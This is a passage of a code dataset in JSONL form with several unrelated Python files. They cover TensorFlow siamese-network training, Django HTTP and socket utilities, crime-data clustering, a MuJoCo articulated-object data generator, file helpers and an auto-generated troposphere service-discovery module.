count, c = sess.run([optimizer, cost], feed_dict={x1: epoch_x1, x2: epoch_x2, y: epoch_y})\r\n epoch_loss += c\r\n \r\n #Find Accuracy While Training\r\n correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct, 'float'))\r\n \r\n print('Epoch', epoch, 'current epoch loss', epoch_loss, 'batch loss', c,'ts',training_steps,' ', end='\\r')\r\n #Log the loss per epoch\r\n print('Epoch', epoch, 'completed out 
of',hm_epochs,'loss:',epoch_loss,' ','batch loss', c,'ts',training_steps,' ' )\r\n \r\n ''' acc_total = 0\r\n correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct, 'float'))\r\n for _ in range(int(trainingData.num_examples/batch_size)):\r\n test_x1, test_x2, test_y = trainingData.generateSiameseBatch(batch_size)\r\n acc = accuracy.eval(feed_dict={x1: test_x1,x2: test_x2, y: test_y})\r\n acc_total += acc\r\n print('Train Accuracy:',acc_total*batch_size/float(trainingData.num_examples),end='\\r')\r\n print('Epoch', epoch, 'current train set accuracy : ',acc_total*batch_size/float(trainingData.num_examples))\r\n \r\n acc_total = 0\r\n correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct, 'float'))\r\n for _ in range(int(testData.num_examples/batch_size)):\r\n test_x1, test_x2, test_y = testData.generateSiameseBatch(batch_size)\r\n acc = accuracy.eval(feed_dict={x1: test_x1,x2: test_x2, y: test_y})\r\n acc_total += acc\r\n print('Test Accuracy:',acc_total*batch_size/float(testData.num_examples),end='\\r')\r\n print('Epoch', epoch, 'current test set accuracy : ',acc_total*batch_size/float(trainingData.num_examples))\r\n '''\r\n acc_total = 0\r\n correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct, 'float'))\r\n for _ in range(int(trainingData.num_examples/batch_size)):\r\n test_x1, test_x2, test_y = trainingData.generateSiameseBatch(batch_size)\r\n acc = accuracy.eval(feed_dict={x1: test_x1,x2: test_x2, y: test_y})\r\n acc_total += acc\r\n print('Train Accuracy:',acc_total*batch_size/float(trainingData.num_examples),end='\\r')\r\n print('Epoch', epoch, 'current train set accuracy : ',acc_total*batch_size/float(trainingData.num_examples))\r\n \r\n acc_total = 0\r\n correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct, 'float'))\r\n for _ in range(int(testData.num_examples/batch_size)):\r\n test_x1, test_x2, test_y = testData.generateSiameseBatch(batch_size)\r\n acc = accuracy.eval(feed_dict={x1: test_x1,x2: test_x2, y: test_y})\r\n acc_total += acc\r\n print('Test Accuracy:',acc_total*batch_size/float(testData.num_examples),end='\\r') \r\n print('Epoch', epoch, 'current test set accuracy : ',acc_total*batch_size/float(testData.num_examples))\r\n\r\n print('Batch - ', batch_size)\r\n print('Epochs - ', epoch_amm)\r\n print('Learning Rate:')\r\n print('flat rate', flat_rate )\r\n print('Base Rate',base_Rate)\r\n print('Decay Steps',decay_steps)\r\n print('Decay Rate',decay_rate)\r\n print('staircase',Staircase)\r\n if Save_save:\r\n Save_path = Save_saver.save(sess , Save_location)\r\n print(\"Model saved in file: %s\" % Save_path)\r\n\r\n sess.close()\r\ntrain_neural_network(x1,x2)","sub_path":"Misc Stuff/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":8322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"650883375","text":"# -*- coding: utf-8 -*-\n__author__ = 'shijin'\n\nimport sys\nimport inspect\nfrom django.contrib.auth.models import User, Group\nfrom django.db.models import Q\nimport re\nimport socket\nimport json\nfrom urllib import request, error\n\nimport logging\nlogger = logging.getLogger('django.ops')\n\nclass DoPostError(Exception): pass\nclass DoGetError(Exception): pass\n\n\ndef get_current_function_name():\n # print(sys._getframe().f_code.co_name) #返回 get_current_function_name 函数名\n # 
print(inspect.stack()[0][3]) # returns info about this function itself\n return inspect.stack()[1][3] # return the name of the calling function, one frame up\n\n\ndef get_class_name(class_obj): # return the class name of the given instance\n if isinstance(class_obj, (object,)):\n return class_obj.__class__.__name__\n\n\ndef isdigit(number):\n try:\n number = int(number)\n return isinstance(number, int)\n except Exception:\n return False\n\n\ndef search_username(fullname):\n \"\"\" search for a User whose first_name and last_name match the given full name \"\"\"\n _fullname = ''.join(str(fullname).split())\n users = User.objects.all()\n try:\n user_qs = users.filter(username=_fullname)\n if user_qs: return user_qs\n\n if len(_fullname) == 2:\n user_qs = users.filter(last_name=_fullname[0], first_name=_fullname[1])\n if user_qs:\n return user_qs\n else:\n return None\n elif len(_fullname) > 2:\n q = Q(last_name=_fullname[0:1], first_name=_fullname[1:]) | Q(last_name=_fullname[0:2],\n first_name=_fullname[2:])\n user_qs = users.filter(q)\n if user_qs:\n return user_qs\n else:\n return None\n except Exception as e:\n logger.error(\"{f} search {n} error: {e}\".format(f=\"search_username\", n=str(fullname), e=repr(e)))\n print(repr(e))\n return None\n\n\ndef get_port(ports, return_type='str'):\n \"\"\" check ports and return str or list\"\"\"\n port_list = list()\n try:\n if ports and isinstance(ports, str):\n # port_list = ports.split(',')\n port_list = re.split(',|,|、', ports)\n elif ports and isinstance(ports, list):\n pass\n else:\n raise ValueError(\"The ports variable has an invalid data type!\")\n\n if port_list:\n port_list = list(set(list(filter(None, port_list))))\n _port_list = list(filter(isdigit, port_list))\n if len(port_list) == len(_port_list):\n if return_type == 'str':\n return ','.join(_port_list)\n else:\n return _port_list\n else:\n raise ValueError(\"The ports variable contains illegal characters!\")\n else:\n raise ValueError(\"The ports variable is empty!\")\n except ValueError:\n raise\n except Exception:\n raise Exception(\"get ports error!\")\n\n\ndef get_hostname():\n \"\"\" :return hostname \"\"\"\n try:\n return socket.gethostname()\n except:\n return None\n\n\ndef get_host_ip(connect_ip, connect_port):\n \"\"\" :param connect_ip connect remote host ip\n connect_port connect remote host port\n :return ip or None\n \"\"\"\n s = None\n ip = None\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((connect_ip, connect_port))\n ip = s.getsockname()[0]\n finally:\n if s is not None:\n s.close()\n return ip\n\n\ndef _do_post(url, **kwargs):\n \"\"\"\n request post method\n \"\"\"\n\n kwargs = kwargs if kwargs else {}\n data = bytes(json.dumps(kwargs), encoding='utf-8')\n req = request.Request(url=url, data=data, method=\"POST\")\n\n for i in range(3):\n _timeout = 3 * i + 3\n try:\n res = request.urlopen(req, timeout=_timeout)\n if res:\n # print('##'*30)\n # print('res:', res)\n # print('**' * 30)\n # print('res.read(): ', str(res.read(), encoding='utf-8'))\n # print('##' * 30)\n return json.loads(str(res.read(), encoding='utf-8'))\n else:\n continue\n except error.HTTPError as e:\n logger.error(\"post request failed, url: {u}, code: {c}!\".format(u=url, c=e.code))\n continue\n except error.URLError as e:\n logger.error(\"post request failed, url: {u}, reason: {c}!\".format(u=url, c=e.reason))\n continue\n except Exception as e:\n logger.error(\"post request failed, url: {u}, {e} !\".format(u=url, e=repr(e)))\n continue\n else:\n raise DoPostError('_do_post error, request failed!')\n\n\ndef _do_get(url, **kwargs):\n \"\"\"\n request get method\n \"\"\"\n\n value = None\n if kwargs:\n value_list = ['{0}={1}'.format(k, v) for k, v in kwargs.items()]\n value = 
'&'.join(value_list)\n\n url = url + '?' + value if value else url # a '?' must separate the path from the query string\n req = request.Request(url=url)\n\n for i in range(3):\n _timeout = 3 * i + 3\n try:\n res = request.urlopen(req, timeout=_timeout)\n if res:\n return json.loads(str(res.read(), encoding='utf-8'))\n else:\n continue\n except error.HTTPError as e:\n logger.error(\"get request failed {0}, {1}!\".format(url, e.code))\n continue\n except error.URLError as e:\n logger.error(\"get request failed {0}, {1}!\".format(url, e.reason))\n continue\n except Exception as e:\n logger.error(\"get request failed {0}, {1} !\".format(url, repr(e)))\n continue\n else:\n raise DoGetError('_do_get error, request failed!')\n","sub_path":"utils/utils_tools.py","file_name":"utils_tools.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"21933382","text":"__author__ = 'viva'\nimport parser\nfrom sklearn import manifold\nfrom sklearn.cluster import KMeans\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\n# crime features analysis\n\nself_defined = ['Personal income <$400/week, %', 'Mental Health',\n 'Did not complete year 12, %', 'Unemployed, %',\n '% dwellings which are public housing',\n '2012 ERP age 15-24, %', '2012 ERP age 25-44, %']\n\nfeatures = parser.get_features()\n\nsuburbs = []\nfor item in features:\n suburbs.append(item)\n\n\ndef suburb_crime():\n suburb_crime_features_raw = {}\n suburb_crime_values = {}\n\n for item in features:\n suburb_crime_features_raw[item] = features[item]\n\n for key in suburb_crime_features_raw:\n\n for key1, value1 in suburb_crime_features_raw[key].iteritems():\n if key1 in self_defined:\n # if '% change, 2007-2012' in key1:\n try:\n suburb_crime_values[key].append(float(value1))\n except ValueError:\n try:\n suburb_crime_values[key].append(0.0)\n except KeyError:\n suburb_crime_values[key] = [0.0]\n except KeyError:\n try:\n suburb_crime_values[key] = [float(value1)]\n except ValueError:\n suburb_crime_values[key] = [0.0]\n\n return suburb_crime_values\n\n\nif __name__ == \"__main__\":\n coords = manifold.MDS(n_components=2).fit([value for key, value in suburb_crime().iteritems()]).embedding_\n\n n_cluster = 4\n k_means = KMeans(init='k-means++', n_clusters=n_cluster, n_init=10)\n k_means.fit(coords)\n k_means_labels = k_means.labels_\n k_means_cluster_centers = k_means.cluster_centers_\n k_means_labels_unique = np.unique(k_means_labels)\n\n colors = ['#4EACC5', '#FF9C34', '#4E9A06', \"#F0F8FF\", \"#800000\", \"#D2691E\", \"#FFFACD\", \"#FA8072\", \"#D2691E\"]\n\n for k, col in zip(range(n_cluster), colors):\n my_members = k_means_labels == k\n cluster_center = k_means_cluster_centers[k]\n plt.plot(coords[my_members, 0], coords[my_members, 1], 'w',\n markerfacecolor=col, marker='o', markersize=20)\n plt.plot(cluster_center[0], cluster_center[1], 'x', markerfacecolor=col,\n markeredgecolor='red', markersize=20, markeredgewidth=2)\n\n # plt.figure(1)\n # plt.scatter(coords[:, 0], coords[:, 1], alpha=0.5)\n\n for label, x, y in zip(suburbs, coords[:, 0], coords[:, 1]):\n plt.annotate(\n label,\n xy=(x, y), xytext=(-20, 20),\n textcoords='offset points', ha='right', va='bottom',\n bbox=dict(boxstyle='round,pad=0.5', fc='white', alpha=0.5),\n arrowprops=dict(arrowstyle='->', connectionstyle='arc3,rad=0'))\n\n 
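# show the MDS scatter: cluster members as coloured dots, k-means centres as red-edged crosses, suburbs annotated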
plt.show()\n","sub_path":"project2/part_B/crime.py","file_name":"crime.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"524551809","text":"import pickle\nimport time\nimport os\nimport csv\nimport copy\n\nimport cv2\nimport h5py\nimport pyro\nimport pyro.distributions as dist\nimport torch\nimport numpy as np\nfrom tqdm import tqdm\nimport transforms3d as tf3d\nfrom mujoco_py import functions\n\nfrom mujoco_py import load_model_from_path, MjSim, MjViewer\nfrom mujoco_py.modder import TextureModder\n\nfrom SyntheticArticulatedData.generation.mujocoCabinetParts import build_cabinet, sample_cabinet\nfrom SyntheticArticulatedData.generation.mujocoDrawerParts import build_drawer, sample_drawers\nfrom SyntheticArticulatedData.generation.mujocoMicrowaveParts import build_microwave, sample_microwave\nfrom SyntheticArticulatedData.generation.mujocoToasterOvenParts import build_toaster, sample_toaster\nfrom SyntheticArticulatedData.generation.mujocoDoubleCabinetParts import build_cabinet2, sample_cabinet2, \\\n set_two_door_control\nfrom SyntheticArticulatedData.generation.mujocoRefrigeratorParts import build_refrigerator, sample_refrigerator\nfrom SyntheticArticulatedData.generation.utils import *\nimport SyntheticArticulatedData.generation.calibrations as calibrations\n\n\ndef white_bg(img):\n mask = 1 - (img > 0)\n img_cp = copy.deepcopy(img)\n img_cp[mask.all(axis=2)] = [255, 255, 255]\n return img_cp\n\n\ndef buffer_to_real(z, zfar, znear):\n return 2 * zfar * znear / (zfar + znear - (zfar - znear) * (2 * z - 1))\n\n\ndef vertical_flip(img):\n return np.flip(img, axis=0)\n\n\ndef should_use_image_hacky(img, bnds=2):\n mask = img > 0\n img_w_bnds = cv2.rectangle(np.zeros((img.shape[0], img.shape[1]), np.uint8), (0, 0),\n (img.shape[1], img.shape[0]), 255, thickness=bnds) > 0\n if np.logical_and(mask, img_w_bnds).sum() > 20:\n return False\n else:\n return True\n\n\ndef should_use_image(img, bigger_image):\n n_obj = (img > 0).sum()\n n_obj_big = (bigger_image > 0).sum()\n if n_obj < 50 or (n_obj / n_obj_big) < 0.40: # Fraction of pixels within smaller image is small\n return False\n else:\n return True\n\n\nclass SceneGenerator():\n def __init__(self, root_dir='bull/test_cabinets/solo', masked=False, debug_flag=False):\n '''\n Class for generating simulated articulated object dataset.\n params:\n - root_dir: save in this directory\n - start_idx: index of first image saved - useful in threading context\n - depth_data: np array of depth images\n - masked: should the background of depth images be 0s or 1s?\n '''\n self.scenes = []\n self.savedir = root_dir\n self.masked = masked\n self.img_idx = 0\n self.depth_data = []\n self.debugging = debug_flag\n print(root_dir)\n\n def write_urdf(self, filename, xml):\n with open(filename, \"w\") as text_file:\n text_file.write(xml)\n\n def sample_obj(self, obj_type, mean_flag, left_only, cute_flag=False):\n if obj_type == 'microwave':\n l, w, h, t, left, mass = sample_microwave(mean_flag)\n if mean_flag:\n obj = build_microwave(l, w, h, t, left,\n set_pose=[1.0, 0.0, -0.15],\n set_rot=[0.0, 0.0, 0.0, 1.0])\n elif cute_flag:\n base_xyz, base_angle = sample_pose()\n base_quat = angle_to_quat(base_angle)\n obj = build_microwave(l, w, h, t, left,\n set_pose=[1.0, 0.0, -0.15],\n set_rot=base_quat)\n else:\n obj = build_microwave(l, w, h, t, left)\n\n elif obj_type == 'drawer':\n l, w, h, t, left, mass = sample_drawers(mean_flag)\n if mean_flag:\n obj = 
build_drawer(l, w, h, t, left,\n set_pose=[1.5, 0.0, -0.4],\n set_rot=[0.0, 0.0, 0.0, 1.0])\n elif cute_flag:\n base_xyz, base_angle = sample_pose()\n base_quat = angle_to_quat(base_angle)\n obj = build_drawer(l, w, h, t, left,\n set_pose=[1.2, 0.0, -0.15],\n set_rot=base_quat)\n else:\n obj = build_drawer(l, w, h, t, left)\n\n elif obj_type == 'toaster':\n l, w, h, t, left, mass = sample_toaster(mean_flag)\n if mean_flag:\n obj = build_toaster(l, w, h, t, left,\n set_pose=[1.5, 0.0, -0.3],\n set_rot=[0.0, 0.0, 0.0, 1.0])\n elif cute_flag:\n base_xyz, base_angle = sample_pose()\n base_quat = angle_to_quat(base_angle)\n obj = build_toaster(l, w, h, t, left,\n set_pose=[1.0, 0.0, -0.15],\n set_rot=base_quat)\n else:\n obj = build_toaster(l, w, h, t, left)\n\n elif obj_type == 'cabinet':\n l, w, h, t, left, mass = sample_cabinet(mean_flag)\n if left_only:\n left = True\n else:\n # left = False\n left = np.random.choice([True, False])\n if mean_flag:\n if left_only:\n left = True\n else:\n left = False\n obj = build_cabinet(l, w, h, t, left,\n set_pose=[1.5, 0.0, -0.3],\n set_rot=[0.0, 0.0, 0.0, 1.0])\n elif cute_flag:\n base_xyz, base_angle = sample_pose()\n base_quat = angle_to_quat(base_angle)\n obj = build_cabinet(l, w, h, t, left,\n set_pose=[1.5, 0.0, -0.15],\n set_rot=base_quat)\n else:\n # left = np.random.choice([True, False])\n obj = build_cabinet(l, w, h, t, left)\n\n elif obj_type == 'cabinet2':\n l, w, h, t, left, mass = sample_cabinet2(mean_flag)\n if mean_flag:\n obj = build_cabinet2(l, w, h, t, left,\n set_pose=[1.5, 0.0, -0.3],\n set_rot=[0.0, 0.0, 0.0, 1.0])\n elif cute_flag:\n base_xyz, base_angle = sample_pose()\n base_quat = angle_to_quat(base_angle)\n obj = build_cabinet2(l, w, h, t, left,\n set_pose=[1.5, 0.0, -0.15],\n set_rot=base_quat)\n else:\n obj = build_cabinet2(l, w, h, t, left)\n\n elif obj_type == 'refrigerator':\n l, w, h, t, left, mass = sample_refrigerator(mean_flag)\n if mean_flag:\n\n obj = build_refrigerator(l, w, h, t, left,\n set_pose=[1.5, 0.0, -0.3],\n set_rot=[0.0, 0.0, 0.0, 1.0])\n elif cute_flag:\n base_xyz, base_angle = sample_pose()\n base_quat = angle_to_quat(base_angle)\n obj = build_refrigerator(l, w, h, t, left,\n set_pose=[2.5, 0.0, -0.75],\n set_rot=base_quat)\n\n else:\n obj = build_refrigerator(l, w, h, t, left)\n\n else:\n raise Exception('uh oh, object not implemented!')\n return obj\n\n def generate_scenes(self, N, objtype, write_csv=True, save_imgs=True, mean_flag=False, left_only=False,\n cute_flag=False):\n fname = os.path.join(self.savedir, 'params.csv')\n h5fname = os.path.join(self.savedir, 'complete_data.hdf5')\n self.img_idx = 0\n i = 0\n with h5py.File(h5fname, 'a') as h5File:\n # for i in tqdm(range(N)):\n pbar = tqdm(total=N)\n str_type = h5py.string_dtype()\n while i < N:\n obj = self.sample_obj(objtype, mean_flag, left_only, cute_flag=cute_flag)\n xml = obj.xml\n fname = os.path.join(self.savedir, 'scene' + str(i).zfill(6) + '.xml')\n grp = h5File.create_group(\"obj_\" + str(i).zfill(6))\n self.write_urdf(fname, xml)\n res = self.take_images(fname, obj, grp, use_force=False)\n if not res:\n del h5File[\"obj_\" + str(i).zfill(6)]\n else:\n i += 1\n pbar.update(1)\n self.scenes.append(fname)\n ds = grp.create_dataset('mujoco_scene_xml', shape=(1,), dtype=str_type)\n ds[:] = xml\n return\n\n def take_images(self, filename, obj, h5group, use_force=False):\n model = load_model_from_path(filename)\n sim = MjSim(model)\n modder = TextureModder(sim)\n # viewer=MjViewer(sim) # this fucking line has caused me (Ben) so much pain.\n\n 
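# flatten the object's type id and geometry parameters into a single embedding vector for the dataset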
embedding = np.append(obj.type, obj.geom.reshape(-1))\n if obj.type == 4 or obj.type == 5:\n # MULTI CABINET: get double the params.\n axis1, door1 = transform_param(obj.params[0][0], obj.params[0][1], obj)\n axis2, door2 = transform_param(obj.params[1][0], obj.params[1][1], obj)\n axes = np.append(axis1, axis2)\n doors = np.append(door1, door2)\n params = np.append(axes, doors)\n set_two_door_control(sim, 'cabinet2' if obj.type == 4 else 'refrigerator')\n n_qpos_variables = 2\n\n else:\n handle_name = 'handle_link'\n joint_body_name = 'cabinet_left_hinge'\n n_qpos_variables = 1\n if obj.type == 1:\n sim.data.ctrl[0] = 0.05\n handle_name = 'knob'\n joint_body_name = 'drawer'\n elif obj.geom[3] == 1:\n sim.data.ctrl[0] = -0.2\n else:\n sim.data.ctrl[0] = 0.2\n\n params = get_cam_relative_params2(obj) # if 1DoF, params is length 10. If 2DoF, params is length 20.\n\n embedding_and_params = np.concatenate((embedding, params, obj.pose, obj.rotation))\n # object_reference_frame_in_world = np.concatenate((obj.pose, obj.rotation))\n\n # print('nqpos', n_qpos_variables)\n # print(self.img_idx, obj.pose)\n # print(embedding_and_params.shape)\n t = 0\n\n #########################\n IMG_WIDTH = calibrations.sim_width\n IMG_HEIGHT = calibrations.sim_height\n #########################\n\n force = np.array([0., 0., 0.])\n if use_force:\n # Generating Data by applying random Cartesian forces\n sim.data.ctrl[0] = 0.\n force = np.array([-1., 0., 0.])\n torque = np.array([0., 0., 0.])\n pt = sim.data.get_body_xpos(handle_name)\n bodyid = sim.model.body_name2id(handle_name)\n\n q_vals = []\n qdot_vals = []\n qddot_vals = []\n torque_vals = []\n applied_forces = []\n moving_frame_xpos_world = []\n moving_frame_xpos_ref_frame = []\n depth_imgs = torch.Tensor()\n\n img_counter = 0\n\n while t < 4000:\n if use_force:\n sim.data.qfrc_applied.fill(0.) 
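                # mj_applyFT maps the Cartesian force/torque applied at point pt on\n                # body bodyid into joint coordinates and *adds* it into qfrc_applied,\n                # so the buffer is zeroed each step to keep the applied wrench\n                # constant instead of accumulating.\n                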
# Have to clear previous data\n functions.mj_applyFT(model, sim.data, force, torque, pt, bodyid, sim.data.qfrc_applied)\n sim.forward()\n sim.step()\n\n \"\"\" Recording data for linear regression at a different frequency than images \"\"\"\n # if t % 10 == 0:\n if t % 250 == 0:\n img, depth = sim.render(IMG_WIDTH, IMG_HEIGHT, camera_name='external_camera_0', depth=True)\n depth = vertical_flip(depth)\n real_depth = buffer_to_real(depth, 12.0, 0.1)\n norm_depth = real_depth / 12.0\n\n # Checking if sampled object is within the image frame or not\n bigger_img = sim.render(int(1.5*IMG_WIDTH), int(1.5*IMG_HEIGHT),\n camera_name='external_camera_0', depth=False)\n if not should_use_image(img, bigger_img):\n self.img_idx -= img_counter\n return False\n\n if self.masked:\n # remove background\n mask = norm_depth > 0.99\n norm_depth = (1 - mask) * norm_depth\n\n if self.debugging:\n # save image to disk for visualization\n # img = cv2.resize(img, (IMG_WIDTH,IMG_HEIGHT))\n\n img = vertical_flip(img)\n img = white_bg(img)\n integer_depth = norm_depth * 255\n\n imgfname = os.path.join(self.savedir, 'img' + str(self.img_idx).zfill(6) + '.png')\n depth_imgfname = os.path.join(self.savedir, 'depth_img' + str(self.img_idx).zfill(6) + '.png')\n cv2.imwrite(imgfname, img)\n cv2.imwrite(depth_imgfname, integer_depth)\n\n # if IMG_WIDTH != 192 or IMG_HEIGHT != 108:\n # depth = cv2.resize(norm_depth, (192,108))\n\n depthfname = os.path.join(self.savedir, 'depth' + str(self.img_idx).zfill(6) + '.pt')\n torch.save(torch.tensor(norm_depth.copy()), depthfname)\n\n depth_imgs = torch.cat((depth_imgs, torch.tensor(norm_depth.copy()).float().unsqueeze_(dim=0)))\n\n q_vals.append(copy.copy(sim.data.qpos[:n_qpos_variables]))\n qdot_vals.append(copy.copy(sim.data.qvel[:n_qpos_variables]))\n qddot_vals.append(copy.copy(sim.data.qacc[:n_qpos_variables]))\n torque_vals.append(copy.copy(sim.data.qfrc_applied[:n_qpos_variables]))\n applied_forces.append(copy.copy(force))\n x_pos = np.append(sim.data.get_body_xpos(handle_name), sim.data.get_body_xquat(handle_name))\n moving_frame_xpos_world.append(copy.copy(x_pos)) # quat comes in wxyz form\n joint_frame_in_world = np.append(sim.data.get_body_xpos(joint_body_name), obj.rotation)\n # moving_frame_xpos_ref_frame.append(copy.copy(\n # change_frames(frame_B_wrt_A=joint_frame_in_world, pose_wrt_A=x_pos)))\n\n self.img_idx += 1\n img_counter += 1\n\n t += 1\n\n h5group.create_dataset('embedding_and_params', data=embedding_and_params)\n h5group.create_dataset('joint_frame_in_world', data=joint_frame_in_world)\n h5group.create_dataset('moving_frame_in_world', data=np.array(moving_frame_xpos_world))\n # h5group.create_dataset('moving_frame_in_ref_frame', data=np.array(moving_frame_xpos_ref_frame))\n h5group.create_dataset('depth_imgs', data=depth_imgs)\n\n h5group.create_dataset('q', data=np.array(q_vals))\n h5group.create_dataset('qdot', data=np.array(qdot_vals))\n h5group.create_dataset('qddot', data=np.array(qddot_vals))\n h5group.create_dataset('torques', data=np.array(torque_vals))\n h5group.create_dataset('forces', data=np.array(applied_forces))\n\n return True\n\n\n# shapes and stuff\n# if 1DoF, params is length 10. 
If 2DoF, params is length 20.\n# embedding is length 5: type, l, w, h, left\n# pose is length 3\n# rotation is length 4\n# finally, q is length 1 or 2.\n# thus, for generating shape data:\n# 1DoF: q is position 21\n# 2DoF: q is position 31\n\n# Object IDs\n# 0 - microwave\n# 1 - drawer\n# 2 - cabinet\n# 3 - toaster\n# 4 - double cabinet\n# 5 - refrigerator\n","sub_path":"generation/generator_v2.py","file_name":"generator_v2.py","file_ext":"py","file_size_in_byte":15676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"360644229","text":"\"\"\"\nThe following module contains functions that help in file and directory\noperations.\n\"\"\"\nimport os\nimport pdb\nimport glob\nimport pathlib\nimport warnings\nimport pandas as pd\n\ndef check_if_file_exists(file_path):\n    \"\"\"\n    If the file does not exist, raise an exception.\n\n    Parameters\n    ----------\n    file_path : str\n        Full path to file\n    \"\"\"\n    if not os.path.isfile(file_path):\n        raise Exception(f\"The file does not exist,\\n\\t{file_path}\")\n\ndef check_if_dir_exists(directory_path):\n    \"\"\"\n    If the directory does not exist, raise an exception.\n\n    Parameters\n    ----------\n    directory_path : str\n        Full path of directory\n    \"\"\"\n    if not os.path.isdir(directory_path):\n        raise Exception(f\"The directory does not exist,\\n\\t{directory_path}\")\n\n\ndef get_file_list(loc, ext):\n    \"\"\" The following function returns all the files in a directory\n    having an extension. This does not do a recursive search.\n\n    Parameters\n    ----------\n    loc : str\n        File location\n    ext : str\n        File extension\n    \"\"\"\n    return glob.glob(f\"{loc}/*.{ext}\")\n\ndef get_files_with_kws(loc, kws):\n    \"\"\"\n    Lists full paths of files having certain keywords in their names\n\n    Parameters\n    ----------\n    loc : str\n        Path to the root directory containing files.\n    kws : list of str\n        List of keywords the file names must contain\n    \"\"\"\n    # Check if directory is valid\n    if not (os.path.exists(loc)):\n        raise Exception(f\"The path {loc} is not valid.\")\n\n    # create a list using comma separated values\n    kw_lst_csv = []\n    for idx, litem in enumerate(kws):\n        litem_split = litem.split(\",\")\n        if len(litem_split) > 1:\n            kw_lst_csv = kw_lst_csv + litem_split\n        else:\n            kw_lst_csv.append(litem_split[0])\n\n    # Loop through each file\n    files = []\n    for r, d, f in os.walk(loc):\n        for file in f:\n            # Check if the current file name contains all of the keywords\n            is_valid_file = all(kw in file for kw in kw_lst_csv)\n            if is_valid_file:\n                files.append(os.path.join(r, file))\n\n    # return\n    return files\n\n\ndef get_file_list_recursive(loc, ext):\n    \"\"\" The following function returns all the files in a directory\n    having an extension. This does a recursive search.\n\n    Parameters\n    ----------\n    loc : str\n        File location\n    ext : str\n        File extension\n    \"\"\"\n    return glob.glob(f\"{loc}/**/*.{ext}\", recursive=True)\n\n\ndef get_loc_name_ext(full_path):\n    \"\"\"\n    Given a full path this function returns a tuple having the\n    following information:\n    full directory path, file name, file extension\n    \"\"\"\n    check_if_file_exists(full_path)\n\n    file_loc = os.path.dirname(full_path)\n    fname_with_ext = os.path.basename(full_path)\n    fname, ext = os.path.splitext(fname_with_ext)\n\n    ext = ext[1:]\n    file_loc = os.path.abspath(file_loc)\n\n    return file_loc, fname, ext\n\n\ndef recursive_mkdir(dir_path):\n    \"\"\" Create directory recursively.\n    \"\"\"\n    if not os.path.isdir(dir_path):\n        path = pathlib.Path(dir_path)\n        path.mkdir(parents=True)\n        print(f\"USER_INFO: Creating directory\\n\\t{dir_path}\")\n\ndef load_all_activity_labels(flist):\n    \"\"\" Loads all activity labels into one dataframe.\n\n    Parameters\n    ----------\n    flist: list of str\n        List of csv file paths having activity labels.\n    \"\"\"\n    dflst = []\n    for f in flist:\n        dflst += [pd.read_csv(f)]\n\n    return pd.concat(dflst, ignore_index=True)\n","sub_path":"harp/fdops.py","file_name":"fdops.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"225728010","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/sanhehu/Documents/GitHub/troposphere_mate-project/troposphere_mate/servicediscovery.py\n# Compiled at: 2020-02-12 18:15:55\n# Size of source mod 2**32: 6994 bytes\n\"\"\"\nThis code is auto generated from troposphere_mate.code_generator.__init__.py scripts.\n\"\"\"\nimport sys\nif sys.version_info.major >= 3:\n    if sys.version_info.minor >= 5:\n        from typing import Union, List, Any\nimport troposphere.servicediscovery\nfrom troposphere.servicediscovery import DnsConfig as _DnsConfig, DnsRecord as _DnsRecord, HealthCheckConfig as _HealthCheckConfig, HealthCheckCustomConfig as _HealthCheckCustomConfig\nfrom troposphere import Template, AWSHelperFn\nfrom troposphere_mate.core.mate import preprocess_init_kwargs, Mixin\nfrom troposphere_mate.core.sentiel import REQUIRED, NOTHING\n\nclass Instance(troposphere.servicediscovery.Instance, Mixin):\n\n    def __init__(self, title, template=None, validation=True, InstanceAttributes=REQUIRED, ServiceId=REQUIRED, InstanceId=NOTHING, **kwargs):\n        processed_kwargs = preprocess_init_kwargs(title=title, \n          template=template, \n          validation=validation, \n          InstanceAttributes=InstanceAttributes, \n          ServiceId=ServiceId, \n          InstanceId=InstanceId, **kwargs)\n        (super(Instance, self).__init__)(**processed_kwargs)\n\n\nclass PrivateDnsNamespace(troposphere.servicediscovery.PrivateDnsNamespace, Mixin):\n\n    def __init__(self, title, template=None, validation=True, Name=REQUIRED, Vpc=REQUIRED, Description=NOTHING, **kwargs):\n        processed_kwargs = preprocess_init_kwargs(title=title, \n          template=template, \n          validation=validation, \n          Name=Name, \n          Vpc=Vpc, \n          Description=Description, **kwargs)\n        (super(PrivateDnsNamespace, self).__init__)(**processed_kwargs)\n\n\nclass PublicDnsNamespace(troposphere.servicediscovery.PublicDnsNamespace, Mixin):\n\n    def __init__(self, title, template=None, validation=True, Name=REQUIRED, Description=NOTHING, **kwargs):\n        processed_kwargs = preprocess_init_kwargs(title=title, \n          template=template, \n          
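# NOTE: REQUIRED and NOTHING are sentinels from troposphere_mate.core.sentiel\n          # (imported above); preprocess_init_kwargs presumably enforces that\n          # REQUIRED kwargs were supplied and drops NOTHING entries before the\n          # super().__init__ call.\n          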
